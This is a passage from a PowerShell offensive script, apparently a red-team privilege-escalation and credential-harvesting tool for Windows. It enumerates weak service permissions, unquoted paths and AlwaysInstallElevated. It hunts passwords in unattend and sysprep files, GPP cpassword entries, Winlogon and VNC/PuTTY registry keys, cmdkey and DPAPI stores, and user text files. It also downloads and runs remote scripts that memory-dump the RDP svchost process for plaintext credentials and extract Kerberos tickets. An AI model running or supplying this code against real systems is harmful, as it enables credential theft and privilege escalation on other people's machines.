\"$Env:TMP\\Sherlock.ps1\"|Unblock-File\r\nImport-Module -Name \"$Env:TMP\\Sherlock.ps1\" -Force;Get-Unquoted SE|Out-String -Stream|Select-Object -Skip 1\r\nWrite-Host \"* ElapsedTime:\" -ForegroundColor Blue -BackgroundColor Black -NoNewline;\r\nWrite-Host \"00:00:03\" -ForegroundColor Green -BackgroundColor Black -NoNewline;\r\nWrite-Host \" - scantype:\" -ForegroundColor Blue -BackgroundColor Black -NoNewline;\r\nWrite-Host \"Unquoted\" -ForegroundColor Green -BackgroundColor Black;\r\nWrite-Host \"`n\"\r\n\r\n\r\nWrite-Host \"WEAK SERVICES REGISTRY PERMISSIONS\"\r\nWrite-Host \"----------------------------------\"\r\n#(Get-Acl -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\services\\*\" -EA SilentlyContinue).PSPath\r\nIf($verb -ieq \"False\")\r\n{\r\n   powershell -File $Env:TMP\\ACLMitreT1574.ps1 -action reg -Egg true\r\n}\r\nElse\r\n{\r\n   powershell -File $Env:TMP\\ACLMitreT1574.ps1 -action reg -extraGroup true -Egg true\r\n}\r\nRemove-Item -path \"$Env:TMP\\ACLMitreT1574.ps1\" -Force\r\nWrite-Host \"`n\"\r\n\r\n\r\n#Define Batch title again because sherlock.ps1 + ACLMitreT1574.ps1 changed it ..\r\n$host.UI.RawUI.WindowTitle = \"@FindEop $BatVersion {SSA RedTeam @2022}\"\r\n\r\n\r\n#List Programs that run at startup\r\nWrite-Host \"SEARCHING PROGRAMS THAT RUN AT STARTUP\"\r\nWrite-Host \"--------------------------------------\"\r\nGet-CimInstance Win32_StartupCommand|Select-Object Name,Command,Location,User|Format-List|Out-String -Stream|Select-Object -Skip 2|Select-Object -SkipLast 2|ForEach-Object {\r\n   $stringformat = If($_ -Match '^(Command  :)')\r\n   {\r\n      @{ 'ForegroundColor' = 'Green' }\r\n   }\r\n   ElseIf($_ -iMatch '^(Location :)')\r\n   {\r\n      @{ 'ForegroundColor' = 'Yellow' }\r\n   }\r\n   Else\r\n   {\r\n      @{ 'ForegroundColor' = 'White' }\r\n   }\r\n   Write-Host @stringformat $_\r\n}\r\nWrite-Host \"\"\r\n\r\n\r\n#List tasks running under system privs\r\nWrite-Host \"TASKS RUNNING UNDER 'SYSTEM' PRIVILEGES\"\r\nWrite-Host 
\"---------------------------------------\"\r\ntasklist /fi 'username eq system'|Format-Table|Out-String -Stream|Select-Object -Skip 1\r\nWrite-Host \"`n\"\r\n\r\n\r\n## REGISTRY SEARCH ##\r\n\r\n\r\n#Get Domain Controllers\r\nWrite-Host \"GET DOMAIN CONTROLLERS\"\r\nWrite-Host \"----------------------\"\r\n$DomainControler = $Env:USERDOMAIN;\r\nWrite-Host DCName::[$DomainControler] 0x995 -ForeGroundColor Yellow;\r\n$um = nltest /DCNAME:$DomainControler;\r\n$do = nltest /DSGETDC:$DomainControler;\r\n$li = nltest /DCLIST:$DomainControler;\r\nIf($um -ieq $null -or $do -ieq $null -or $li -ieq $null)\r\n{\r\n   Write-Host \"[MITRE::T1069] fail to found a valid DC name.\" -ForeGroundColor Red -BackGroundColor Black\r\n}\r\nWrite-Host \"`n\"\r\n\r\n\r\n#Powershell engine settings\r\nWrite-Host \"DETECTING POWERSHELL ENGINE\"\r\nWrite-Host \"---------------------------\"\r\n$PSDefaultVersion = (Get-Host).Version.ToString();\r\nwrite-host \"PowershellDefault : $PSDefaultVersion\" -ForeGroundColor Yellow\r\n$TESTREGISTRY = reg query \"HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\PowerShellEngine\" /v PowerShellVersion | findstr /C:'2.0';\r\nIf($TESTREGISTRY)\r\n{\r\n   Write-Host \"PowerShellVersion : 2.0 => [VULNERABLE::T1562]\" -ForeGroundColor Green -BackGroundColor Black\r\n}\r\nElse\r\n{\r\n   Write-Host \"ERROR: The system was unable to find the specified registry key or value.\"\r\n}\r\n(reg query \"HKLM\\SOFTWARE\\Microsoft\\PowerShell\\3\\PowerShellEngine\" /v PowerShellVersion | findstr /C:'5.') -replace '    PowerShellVersion    REG_SZ   ','PowerShellVersion :'\r\n(reg query \"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ModuleLogging\" /v EnableModuleLogging | findstr /C:'0x1') -replace '    EnableModuleLogging    REG_DWORD    0x1','EnableModuleLogging : True'\r\n(reg query \"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging | findstr /C:'0x1') -replace '    EnableScriptBlockLogging    REG_DWORD  
  0x1','EnableScriptBlockLogging : True'\r\nWrite-Host \"`n\"\r\nStart-Sleep -Milliseconds 800\r\n\r\n\r\n#Is RDP access Enabled?\r\nWrite-Host \"IS RDP ACCESS ENABLED?\"\r\nWrite-Host \"----------------------\"\r\ntry{\r\n   $TESTREGISTRY = Get-ItemPropertyValue -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" -Name fDenyTSConnections -EA SilentlyContinue;\r\n   If($TESTREGISTRY -Match '0')\r\n   {\r\n      Write-Host \"[RDP] Connections: Allowed fDenyTSConnections REG_DWORD 0X$TESTREGISTRY\" -ForeGroundColor Green -BackGroundColor Black\r\n   }\r\n   Else\r\n   {\r\n      Write-Host \"[RDP] Connections: NotAllowed REG_DWORD 0x1.\"\r\n   }\r\n}catch{\r\n   Write-Host \"[RDP] Connections: NotAllowed REG_DWORD 0x1.\"\r\n}\r\nWrite-Host \"`n\"\r\n\r\n\r\n#Remote Desktop Credentials Manager\r\nWrite-Host \"REMOTE DESKTOP CREDENTIALS MANAGER\"\r\nWrite-Host \"----------------------------------\"\r\nIf(Test-Path -Path \"$Env:LOCALAPPDATA\\Microsoft\\Remote Desktop Connection Manager\\RDCMan.settings\" -ErrorAction SilentlyContinue)\r\n{\r\n   Write-Host \"Exists       : True\"\r\n   Write-Host \"Name         : RDCMan.settings\"\r\n   Write-Host \"Directory    : %LOCALAPPDATA%\\Microsoft\\Remote Desktop Connection Manager\" -ForeGroundColor Green\r\n   Write-Host \"vulnerablity : Credentials are stored inside [ .rdg ] files ..\" -ForeGroundColor Yellow\r\n}\r\nElse\r\n{\r\n   Write-Host \"[RDP] not found: %LOCALAPPDATA%\\Microsoft\\Remote Desktop Connection Manager\\RDCMan.settings\"\r\n}\r\nWrite-Host \"`n\"\r\n\r\n\r\nWrite-Host \"DUMPING PLAINTEXT RDP CREDENTIALS FROM SVCHOST\" #WSearch\r\nWrite-Host \"[i] Credentials are stored in plaintext in memory\" -ForeGroundColor Yellow\r\nWrite-Host \"-------------------------------------------------\"\r\nIf((Get-Service -Name \"termservice\" -EA SilentlyContinue).Status -ieq \"Running\")\r\n{\r\n   Write-Host \"[\" -ForeGroundColor DarkGray -NoNewline;\r\n   Write-Host \"RDP\" -ForeGroundColor Green 
-NoNewline;\r\n   Write-Host \"] 'termservice' service running! [\" -ForeGroundColor DarkGray -NoNewline;\r\n   Write-Host \"OK\" -ForeGroundColor Green -NoNewline;\r\n   Write-Host \"]\" -ForeGroundColor DarkGray;\r\n\r\n   ## Query for svchost service Id (Responding) which has loaded rdpcorets.dll\r\n   # $QueryTasts = tasklist /M:rdpcorets.dll|findstr \"svchost\"\r\n   $PPID = (PS -EA SilentlyContinue | Where-Object {\r\n      $_.ProcessName -iMatch 'svchost' -and $_.Responding -iMatch 'True' -and $_.Modules.ModuleName -iMatch \"rdpcorets.dll\"\r\n   }).Id\r\n\r\n   If($PPID)\r\n   {\r\n      $IPATH = (Get-Location).Path.ToString()\r\n      Write-Host \"[\" -ForeGroundColor DarkGray -NoNewline;\r\n      Write-Host \"RDP\" -ForeGroundColor Green -NoNewline;\r\n      Write-Host \"] 'rdpcorets.dll' loaded by svchost! [\" -ForeGroundColor DarkGray -NoNewline;\r\n      Write-Host \"VULNERABLE::T1021\" -ForeGroundColor Green -NoNewline;\r\n      Write-Host \"]\" -ForeGroundColor DarkGray;\r\n      Start-Sleep -Milliseconds 1400\r\n\r\n      #Get-ProcessMiniDump requires Administrator privileges to run!\r\n      $bool = (([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match \"S-1-5-32-544\")\r\n      If($bool)\r\n      {\r\n         #Download Get-ProcessMiniDump cmdlet from my GitHub repo\r\n         iwr -Uri \"https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/Get-ProcessMiniDump.ps1\" -OutFile \"$Env:TMP\\Get-ProcessMiniDump.ps1\"|Unblock-File\r\n\r\n         cd $Env:TMP\r\n         Import-Module -Name .\\Get-ProcessMiniDump.ps1 -Force\r\n         Get-ProcessMiniDump -ProcID $PPID -Path \"$Env:TMP\\rdpcoretsDLL.out\"\r\n         ## Use comsvc.dll to dump svchost process (alternative to above cmdline)\r\n         # .\\rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump [PROCESS ID] [FILE PATH] full\r\n         Write-Host \"[\" -ForeGroundColor DarkGray -NoNewline;\r\n         Write-Host \"RDP\" -ForeGroundColor Green 
-NoNewline;\r\n         Write-Host \"] 'svchost' dumped to '\" -ForeGroundColor DarkGray -NoNewline;\r\n         Write-Host \"$Env:TMP\\rdpcoretsDLL.out\" -ForeGroundColor Green -NoNewline;\r\n         Write-Host \"'\" -ForeGroundColor DarkGray;\r\n         Remove-Item -Path \"$Env:TMP\\Get-ProcessMiniDump.ps1\" -EA SilentlyContinue -Force\r\n         cd $IPATH \r\n      }\r\n       Else\r\n      {\r\n         Write-Host \"[\" -ForeGroundColor DarkGray -NoNewline;\r\n         Write-Host \"RDP\" -ForeGroundColor Red -NoNewline;\r\n         Write-Host \"] 'Get-ProcessMiniDump' requires administrator privileges! [\" -ForeGroundColor DarkGray -NoNewline;\r\n         Write-Host \"FAIL\" -ForeGroundColor Red -NoNewline;\r\n         Write-Host \"]\" -ForeGroundColor DarkGray;\r\n      }\r\n   }\r\n   Else\r\n   {\r\n      Write-Host \"[\" -ForeGroundColor DarkGray -NoNewline;\r\n      Write-Host \"RDP\" -ForeGroundColor Red -NoNewline;\r\n      Write-Host \"] 'rdpcorets.dll' not loaded by svchost service! 
[\" -ForeGroundColor DarkGray -NoNewline;\r\n      Write-Host \"FAIL\" -ForeGroundColor Red -NoNewline;\r\n      Write-Host \"]\" -ForeGroundColor DarkGray;\r\n   }\r\n}\r\nElse\r\n{\r\n   Write-Host \"[RDP] 'termservice' service stopped!\" -ForeGroundColor Red -BackGroundColor Black\r\n}\r\nwrite-host \"`n\"\r\n\r\n\r\nIf($verb -ieq \"True\")\r\n{\r\n   #Cloud db Credentials in C:\\Users\r\n   Write-Host \"CLOUD CREDENTIALS in $Env:USERPROFILE\"\r\n   Write-Host \"-----------------------------------\"\r\n   $TESTFILES = (Get-ChildItem -Path \"$Env:USERPROFILE\" -Recurse -Include 'credentials.db','access_tokens.db','accessTokens.json','azureProfile.json','legacy_credentials','gcloud' -Exclude 'Saved Games','Starcraft II','Music','Searches','Favorites','Videos','Battle.net','old_Cache_000','CacheStorage','GPUCache' -Force -EA SilentlyContinue).FullName;\r\n   If($TESTFILES)\r\n   {\r\n      Write-Host \"[CLOUD] $TESTFILES\" -ForeGroundColor Green -BackGroundColor Black\r\n   }\r\n   Else\r\n   {\r\n      Write-Host \"[CLOUD] not found: credentials in db files.\" -ForeGroundColor Red -BackGroundColor Black\r\n   }\r\n   Write-Host \"`n\"\r\n}\r\n\r\n\r\n#List unattend.xml files\r\nWrite-Host \"LIST UNATTEND.XML FILES EXISTENCE\"\r\nWrite-Host \"[i] Creds are stored in base64 and can be decoded manually.\" -ForeGroundColor Yellow\r\nWrite-Host \"----------------------------------------------------------\"\r\nfindstr /S /I cpassword \\\\$FQDN\\sysvol\\$FQDN\\policies\\*.xml\r\n$TESTXML = (Get-ChildItem \"$Env:WINDIR\\unattend.xml\" -EA SilentlyContinue|Select-Object *).FullName;\r\nIf($TESTXML)\r\n{\r\n   Write-Host \"[XML]:[VULNERABLE::T1552] $TESTXML\" -ForeGroundColor Green -BackGroundColor Black\r\n}\r\nElse\r\n{\r\n   Write-Host \"[XML] not found: $Env:WINDIR\\unattend.xml\"\r\n}\r\n$TESTXML = (Get-ChildItem \"$Env:WINDIR\\sysprep\\sysprep.xml\" -EA SilentlyContinue|Select-Object *).FullName;\r\nIf($TESTXML)\r\n{\r\n   Write-Host \"[XML]:[VULNERABLE::T1552] 
$TESTXML\" -ForeGroundColor Green -BackGroundColor Black\r\n}\r\nElse\r\n{\r\n   Write-Host \"[XML] not found: $Env:WINDIR\\sysprep\\sysprep.xml\"\r\n}\r\n$TESTXML = (Get-ChildItem \"$Env:WINDIR\\sysprep\\sysprep.inf\" -EA SilentlyContinue|Select-Object *).FullName;\r\nIf($TESTXML)\r\n{\r\n   Write-Host \"[XML]:[VULNERABLE::T1552] $TESTXML\" -ForeGroundColor Green -BackGroundColor Black\r\n}\r\nElse\r\n{\r\n   Write-Host \"[XML] not found: $Env:WINDIR\\sysprep\\sysprep.inf\"\r\n}\r\n$TESTXML = (Get-ChildItem \"$Env:WINDIR\\system32\\sysprep.inf\" -EA SilentlyContinue|Select-Object *).FullName;\r\nIf($TESTXML)\r\n{\r\n   Write-Host \"[XML]:[VULNERABLE::T1552] $TESTXML\" -ForeGroundColor Green -BackGroundColor Black\r\n}\r\nElse\r\n{\r\n   Write-Host \"[XML] not found: $Env:WINDIR\\system32\\sysprep.inf\"\r\n}\r\n$TESTXML = (Get-ChildItem \"$Env:WINDIR\\Panther\\Unattend.xml\" -EA SilentlyContinue|Select-Object *).FullName;\r\nIf($TESTXML)\r\n{\r\n   Write-Host \"[XML]:[VULNERABLE::T1552] $TESTXML\" -ForeGroundColor Green -BackGroundColor Black\r\n}\r\nElse\r\n{\r\n   Write-Host \"[XML] not found: $Env:WINDIR\\Panther\\unattend.xml\"\r\n}\r\n$TESTXML = (Get-ChildItem \"$Env:WINDIR\\system32\\sysprep\\sysprep.xml\" -EA SilentlyContinue|Select-Object *).FullName;\r\nIf($TESTXML)\r\n{\r\n   Write-Host \"[XML]:[VULNERABLE::T1552] $TESTXML\" -ForeGroundColor Green -BackGroundColor Black\r\n}\r\nElse\r\n{\r\n   Write-Host \"[XML] not found: $Env:WINDIR\\system32\\sysprep\\sysprep.xml\"\r\n}\r\n$TESTXML = (Get-ChildItem \"$Env:WINDIR\\Panther\\Unattend\\Unattend.xml\" -EA SilentlyContinue|Select-Object *).FullName;\r\nIf($TESTXML)\r\n{\r\n   Write-Host \"[XML]:[VULNERABLE::T1552] $TESTXML\" -ForeGroundColor Green -BackGroundColor Black\r\n}\r\nElse\r\n{\r\n   Write-Host \"[XML] not found: $Env:WINDIR\\Panther\\unattend\\unattend.xml\"\r\n}\r\nIf($Verb -ieq \"True\")\r\n{\r\n   Write-Host \"[XML] Searching: for extra XML preference files.\" -ForeGroundColor Yellow\r\n   
$AllUsers = \"$Env:ALLUSERSPROFILE\";\r\n   $XMLFiles = (Get-ChildItem -Path \"$AllUsers\" -Recurse -Include 'Groups.xml','Services.xml','Scheduledtasks.xml','DataSources.xml','Printers.xml','Drives.xml' -Force -EA SilentlyContinue).FullName;\r\n   If(-not($XMLFiles))\r\n   {\r\n      Write-Host \"[XML] not found: $AllUsers extra XML files.\" -ForeGroundColor Red -BackGroundColor Black\r\n   }\r\n   Else\r\n   {\r\n      Write-Host \"[XML]:[VULNERABLE::T1552]\" -ForeGroundColor Green -BackGroundColor Black;\r\n      Write-Host $FoundXmlFile\r\n   }\r\n}\r\nWrite-Host \"`n\"\r\n\r\n\r\n#List AlwaysInstallElevated\r\nWrite-Host \"REGISTRY ALWAYSINSTALLELEVATED\"\r\nWrite-Host \"------------------------------\"\r\n$TESTREGISTRY = Get-ItemPropertyValue -Path \"HKCU:\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\" -Name AlwaysInstallElevated -EA SilentlyContinue;\r\nIf($TESTREGISTRY)\r\n{\r\n   Write-Host \"[HKCU] AlwaysInstallElevated => [VULNERABLE::T1078]\" -ForeGroundColor Green -BackGroundColor Black\r\n}\r\nElse\r\n{\r\n   Write-Host \"[HKCU] AlwaysInstallElevated: none vulnerable settings found.\"\r\n}\r\n$TESTREGISTRY = Get-ItemPropertyValue -Path \"HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\" -Name AlwaysInstallElevated -EA SilentlyContinue;\r\nIf($TESTREGISTRY)\r\n{\r\n   Write-Host \"[HKLM] AlwaysInstallElevated => [VULNERABLE::T1078]\" -ForeGroundColor Green -BackGroundColor Black\r\n}\r\nElse\r\n{\r\n   Write-Host \"[HKLM] AlwaysInstallElevated: none vulnerable settings found.\"\r\n}\r\nWrite-Host \"`n\"\r\n\r\n\r\n#Registry raw credentials search\r\nWrite-Host \"REGISTRY RAW CREDENTIALS SEARCH\"\r\nWrite-Host \"-------------------------------\"\r\n$StdOut = reg query \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\Currentversion\\Winlogon\"|findstr 'LastUsedUsername DefaultUserName DefaultDomainName DefaultPassword';\r\nWrite-Host \"$StdOut\" -ForeGroundColor Green\r\n$TESTREGISTRY = Get-Item -Path 
\"HKLM:\\SYSTEM\\Current\\ControlSet\\Services\\SNMP\" -EA SilentlyContinue;\r\nIf($TESTREGISTRY)\r\n{\r\n   Write-Host \"    [SNMP]     found => [VULNERABLE::T1078]\" -ForeGroundColor Green -BackGroundColor Black\r\n}\r\nElse\r\n{\r\n   Write-Host \"    [SNMP]     : none vulnerable settings found.\"\r\n}\r\n$TESTREGISTRY = Get-Item -Path \"HKCU:\\Software\\SimonTatham\\PuTTY\\Sessions\" -EA SilentlyContinue;\r\nIf($TESTREGISTRY)\r\n{\r\n   Write-Host \"    [PuTTY]    found => [VULNERABLE::T1078]\" -ForeGroundColor Green -BackGroundColor Black\r\n}\r\nElse\r\n{\r\n   Write-Host \"    [PuTTY]    : none vulnerable settings found.\"\r\n}\r\n$TESTREGISTRY = Get-Item -Path \"HKCU:\\Software\\ORL\\WinVNC3\\Password\" -EA SilentlyContinue;\r\nIf($TESTREGISTRY)\r\n{\r\n   Write-Host \"    [WinVNC3]  found => [VULNERABLE::T1078]\" -ForeGroundColor Green -BackGroundColor Black\r\n}\r\nElse\r\n{\r\n   Write-Host \"    [WinVNC3]  : none vulnerable settings found.\"\r\n}\r\n$TESTREGISTRY = Get-ItemPropertyValue -Path \"HKLM:\\SOFTWARE\\RealVNC\\WinVNC4\" -Name password -EA SilentlyContinue;\r\nIf($TESTREGISTRY)\r\n{\r\n   Write-Host \"    [WinVNC4]  $TESTREGISTRY => [VULNERABLE::T1012]\" -ForeGroundColor Green -BackGroundColor Black\r\n}\r\nElse\r\n{\r\n   Write-Host \"    [WinVNC4]  : none vulnerable settings found.\"\r\n}\r\n$TESTREGISTRY = Get-Item -Path \"HKCU:\\Software\\OpenSSH\\Agent\\Keys\" -EA SilentlyContinue;\r\nIf($TESTREGISTRY)\r\n{\r\n   Write-Host \"    [OpenSSH]  found => [VULNERABLE::T1078]\" -ForeGroundColor Green -BackGroundColor Black\r\n}\r\nElse\r\n{\r\n   Write-Host \"    [OpenSSH]  : none vulnerable settings found.\"\r\n}\r\n$TESTREGISTRY = Get-Item -Path \"HKCU:\\Software\\TightVNC\\Server\" -EA SilentlyContinue;\r\nIf($TESTREGISTRY)\r\n{\r\n   Write-Host \"    [TightVNC] found => [VULNERABLE::T1078]\" -ForeGroundColor Green -BackGroundColor Black\r\n}\r\nElse\r\n{\r\n   Write-Host \"    [TightVNC] : none vulnerable settings found.\"\r\n}\r\nWrite-Host 
\"`n\"\r\n\r\n\r\n#LogonCredentialsPlainInMemory\r\nWrite-Host \"LOGON_CREDENTIALS_PLAIN_IN_MEMORY WDIGEST\"\r\nWrite-Host \"-----------------------------------------\"\r\ntry{\r\n   $TESTREGISTRY = Get-ItemPropertyValue -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\" -Name UseLogonCredential -EA SilentlyContinue;\r\n   If($TESTREGISTRY -Match '1')\r\n   {\r\n      Write-Host \"[VULNERABLE::T1012] UseLogonCredential REG_DWORD 0X$TESTREGISTRY\" -ForeGroundColor Green -BackGroundColor Black\r\n   }\r\n   Else\r\n   {\r\n      Write-Host \"[WDIGEST] none vulnerable settings found.\"\r\n   }\r\n}catch{\r\n   Write-Host \"[WDIGEST] none vulnerable settings found.\"\r\n}\r\nWrite-Host \"`n\"\r\nStart-Sleep -Milliseconds 800\r\n\r\n\r\n\r\n#List Stored cmdkey creds\r\nWrite-Host \"STORED CMDKEY CREDENTIALS (runas)\"\r\nWrite-Host \"---------------------------------\"\r\ncmdkey /list|Format-Table|Out-String -Stream|Select-Object -Skip 3\r\nWrite-Host \"\"\r\n\r\n\r\n#Kerberos Tickets\r\nWrite-Host \"KERBEROS TICKETS\"\r\nWrite-Host \"----------------\"\r\nklist|Where-Object {$_ -ne ''}|Out-String -Stream|ForEach-Object {\r\n   $stringformat = If($_ -iMatch '\\(0\\)')\r\n   {\r\n      @{ 'ForegroundColor' = 'Red' }\r\n   }\r\n   ElseIf($_ -iMatch '\\(\\d+\\)')\r\n   {\r\n      @{ 'ForegroundColor' = 'Green' }\r\n   }\r\n   Else\r\n   {\r\n      @{ 'ForegroundColor' = 'White' }\r\n   }\r\n   Write-Host @stringformat $_\r\n}\r\n$bool = (([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match \"S-1-5-32-544\");\r\nIf(-not($bool))\r\n{\r\n   Write-Host \"[i] Low privileges detected, running on demo mode ..\" -ForegroundColor red -BackGroundColor Black\r\n   Write-Host \"\";Start-Sleep -Milliseconds 800\r\n}\r\niwr -Uri \"https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/GetKerbTix.ps1\" -OutFile \"$Env:TMP\\GetKerbTix.ps1\"|Unblock-File\r\nImport-Module -Name \"$Env:TMP\\GetKerbTix.ps1\" -Force|Out-String 
-Stream|ForEach-Object {\r\n   $stringformat = If($_ -iMatch '^(klist failed)')\r\n   {\r\n      @{ 'ForegroundColor' = 'Red' }\r\n   }\r\n   Else\r\n   {\r\n      @{ 'ForegroundColor' = 'White' }\r\n   }\r\n   Write-Host @stringformat $_\r\n}\r\nRemove-Item -Path \"$Env:TMP\\GetKerbTix.ps1\" -Force\r\nWrite-Host \"\"\r\n\r\n\r\n#DPAPI MASTER KEYS\r\nWrite-Host \"DPAPI MASTER KEYS\"\r\nWrite-Host \"-----------------\"\r\n#https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/dpapi-extracting-passwords\r\nGet-ChildItem -Path \"$Env:APPDATA\\Microsoft\\Protect\" -EA SilentlyContinue|Select-Object Name,LastWriteTime|Format-Table|Out-String -Stream|Select -Skip 1|Select -SkipLast 1\r\nWrite-Host \"Use Mimikatz 'dpapi::cred' module with /masterkey to decrypt!\" -ForeGroundColor Yellow\r\n(Get-ChildItem \"$Env:APPDATA\\Microsoft\\Credentials\" -Attributes Hidden -Force -EA SilentlyContinue).Name\r\n(Get-ChildItem \"$Env:LOCALAPPDATA\\Microsoft\\Credentials\" -Attributes Hidden -Force -EA SilentlyContinue).Name\r\nWrite-Host \"`n\"\r\n\r\n\r\n#hardcoded credentials in text\\xml\\log files\r\nWrite-Host \"HARDCODED CREDENTIALS IN CLEARTEXT?\"\r\nWrite-Host \"-----------------------------------\"\r\nIf(Test-Path -Path \"$Env:USERPROFILE\\Desktop\" -EA SilentlyContinue)\r\n{\r\n   #Build credentials dump DataTable!\r\n   $credstable = New-Object System.Data.DataTable\r\n   $credstable.Columns.Add(\"FileName    \")|Out-Null\r\n   $credstable.Columns.Add(\"Catched Credentials\")|Out-Null\r\n\r\n   Write-Host \"[DIRECTORY] Scanning : '$Env:USERPROFILE\\Desktop'\"\r\n   $FilesToScan = (Get-ChildItem \"$Env:USERPROFILE\\Desktop\" -EA SilentlyContinue).FullName|Where-Object {$_ -iMatch '(.log|.txt|.xml)$'}\r\n   ForEach($FoundFile in $FilesToScan)\r\n   {\r\n      $UserCreds = Get-Content -Path \"$FoundFile\" -EA SilentlyContinue|Where-Object {$_ -iMatch '(Username|User:|user name)'}\r\n      If($UserCreds)\r\n      {\r\n         #Adding values to output 
DataTable!\r\n         $FoundName = $FoundFile.Split('\\\\')[-1]\r\n         $credstable.Rows.Add(\"$FoundName\",\"$UserCreds\")|Out-Null\r\n      }\r\n\r\n      $PassCreds = Get-Content -Path \"$FoundFile\" -EA SilentlyContinue|Where-Object {$_ -iMatch '(pass|Password|passwd|login)'}\r\n      If($PassCreds)\r\n      {\r\n         #Adding values to output DataTable!\r\n         $FoundName = $FoundFile.Split('\\\\')[-1]\r\n         $credstable.Rows.Add(\"$FoundName\",\"$PassCreds\")|Out-Null\r\n      }\r\n\r\n   }\r\n\r\n   #Display Output DataTable\r\n   $credstable | Format-Table -AutoSize | Out-String -Stream | Select-Object -SkipLast 1 | ForEach-Object {\r\n      $stringformat = If($_ -iMatch '^(FileName)')\r\n      {\r\n         @{ 'ForegroundColor' = 'Green' }\r\n      }\r\n      Else\r\n      {\r\n         @{ 'ForegroundColor' = 'White' }\r\n      }\r\n      Write-Host @stringformat $_\r\n   }\r\n\r\n}\r\nElse\r\n{\r\n   Write-Host \"[DIRECTORY] NotFound : '$Env:USERPROFILE\\Desktop'\" -ForeGroundColor Red \r\n}\r\n\r\n\r\nIf(Test-Path -Path \"$Env:ONEDRIVE\\Desktop\" -EA SilentlyContinue)\r\n{\r\n   #Build credentials dump DataTable!\r\n   $credstable = New-Object System.Data.DataTable\r\n   $credstable.Columns.Add(\"FileName    \")|Out-Null\r\n   $credstable.Columns.Add(\"Catched Credentials\")|Out-Null\r\n\r\n   Write-Host \"[DIRECTORY] Scanning : '$Env:ONEDRIVE\\Desktop'\"\r\n   $FilesToScan = (Get-ChildItem \"$Env:ONEDRIVE\\Desktop\" -EA SilentlyContinue).FullName|Where-Object {$_ -iMatch '(.log|.txt|.xml)$'}\r\n   ForEach($FoundFile in $FilesToScan)\r\n   {\r\n      $UserCreds = Get-Content -Path \"$FoundFile\" -EA SilentlyContinue|Where-Object {$_ -iMatch '(Username|User:|user name)'}\r\n      If($UserCreds)\r\n      {\r\n         #Adding values to output DataTable!\r\n         $FoundName = $FoundFile.Split('\\\\')[-1]\r\n         $credstable.Rows.Add(\"$FoundName\",\"$UserCreds\")|Out-Null\r\n      }\r\n\r\n      $PassCreds = Get-Content -Path 
\"$FoundFile\" -EA SilentlyContinue|Where-Object {$_ -iMatch '(pass|Password|passwd|login)'}\r\n      If($PassCreds)\r\n      {\r\n         #Adding values to output DataTable!\r\n         $FoundName = $FoundFile.Split('\\\\')[-1]\r\n         $credstable.Rows.Add(\"$FoundName\",\"$PassCreds\")|Out-Null\r\n      }\r\n\r\n   }\r\n\r\n   #Display output DataTable\r\n   $credstable | Format-Table -AutoSize | Out-String -Stream | Select-Object -SkipLast 1 | ForEach-Object {\r\n      $stringformat = If($_ -iMatch '^(FileName)')\r\n      {\r\n         @{ 'ForegroundColor' = 'Green' }\r\n      }\r\n      Else\r\n      {\r\n         @{ 'ForegroundColor' = 'White' }\r\n      }\r\n      Write-Host @stringformat $_\r\n   }\r\n\r\n}\r\nElse\r\n{\r\n   Write-Host \"[DIRECTORY] NotFound : '$Env:ONEDRIVE\\Desktop'\" -ForeGroundColor Red \r\n}\r\n\r\n\r\nIf(Test-Path -Path \"$Env:USERPROFILE\\Documents\" -EA SilentlyContinue)\r\n{\r\n   #Build credentials dump DataTable!\r\n   $credstable = New-Object System.Data.DataTable\r\n   $credstable.Columns.Add(\"FileName    \")|Out-Null\r\n   $credstable.Columns.Add(\"Catched Credentials\")|Out-Null\r\n\r\n   Write-Host \"[DIRECTORY] Scanning : '$Env:USERPROFILE\\Documents'\"\r\n   $FilesToScan = (Get-ChildItem \"$Env:USERPROFILE\\Documents\" -EA SilentlyContinue).FullName|Where-Object {$_ -iMatch '(.log|.txt|.xml|.ini)$'}\r\n   ForEach($FoundFile in $FilesToScan)\r\n   {\r\n      $UserCreds = Get-Content -Path \"$FoundFile\" -EA SilentlyContinue|Where-Object {$_ -iMatch '(Username|User:|user name)'}\r\n      If($UserCreds)\r\n      {\r\n         #Adding values to output DataTable!\r\n         $FoundName = $FoundFile.Split('\\\\')[-1]\r\n         $credstable.Rows.Add(\"$FoundName\",\"$UserCreds\")|Out-Null\r\n      }\r\n\r\n      $PassCreds = Get-Content -Path \"$FoundFile\" -EA SilentlyContinue|Where-Object {$_ -iMatch '(pass|Password|passwd|login)'}\r\n      If($PassCreds)\r\n      {\r\n         #Adding values to output DataTable!\r\n     
    $FoundName = $FoundFile.Split('\\\\')[-1]\r\n         $credstable.Rows.Add(\"$FoundName\",\"$PassCreds\")|Out-Null\r\n      }\r\n\r\n   }\r\n\r\n   #Display output DataTable\r\n   $credstable | Format-Table -AutoSize | Out-String -Stream | Select-Object -SkipLast 1 | ForEach-Object {\r\n      $stringformat = If($_ -iMatch '^(FileName)')\r\n      {\r\n         @{ 'ForegroundColor' = 'Green' }\r\n      }\r\n      Else\r\n      {\r\n         @{ 'ForegroundColor' = 'White' }\r\n      }\r\n      Write-Host @stringformat $_\r\n   }\r\n\r\n}\r\nElse\r\n{\r\n   Write-Host \"[DIRECTORY] NotFound : '$Env:USERPROFILE\\Documents'\" -ForeGroundColor Red \r\n}\r\n\r\n\r\nIf(Test-Path -Path \"$Env:TMP\" -EA SilentlyContinue)\r\n{\r\n   #Build credentials dump DataTable!\r\n   $credstable = New-Object System.Data.DataTable\r\n   $credstable.Columns.Add(\"FileName    \")|Out-Null\r\n   $credstable.Columns.Add(\"Catched Credentials\")|Out-Null\r\n\r\n   Write-Host \"[DIRECTORY] Scanning : 